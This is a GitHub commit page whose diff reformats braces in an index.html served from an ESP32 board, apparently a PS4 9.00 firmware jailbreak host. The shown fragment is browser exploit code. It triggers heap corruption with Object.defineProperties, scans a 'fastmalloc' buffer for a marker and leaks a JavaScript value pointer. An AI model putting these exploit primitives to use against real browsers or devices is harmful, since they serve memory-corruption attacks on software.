Skip to content

Commit

Permalink
Fix TYPO
Browse files Browse the repository at this point in the history
  • Loading branch information
kmeps4 committed Dec 24, 2022
1 parent b26fe0b commit 686d7ea
Showing 1 changed file with 4 additions and 2 deletions.
6 changes: 4 additions & 2 deletions ESP32_Server_900u/data/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -1762,9 +1762,11 @@ <h1 id=msgs style='font-size:25px;text-align:center;color:white'>Kameleon 900FW

var jsvalue_leak = null;

while (jsvalue_leak === null) {
while (jsvalue_leak === null)
{
Object.defineProperties({}, props);
for(var i = fastmalloc.indexOf("\u0042\u0044\u0043\u0041\u0000\u0000\u00fe\u00ff");; i++)
{
if (fastmalloc.charCodeAt(i) == 0x42 &&
fastmalloc.charCodeAt(i + 1) == 0x44 &&
fastmalloc.charCodeAt(i + 2) == 0x43 &&
Expand All @@ -1777,7 +1779,7 @@ <h1 id=msgs style='font-size:25px;text-align:center;color:white'>Kameleon 900FW
) {
jsvalue_leak = stringToPtr(fastmalloc, i + 32);
break;
}
}
}
}

Expand Down

0 comments on commit 686d7ea

Please sign in to comment.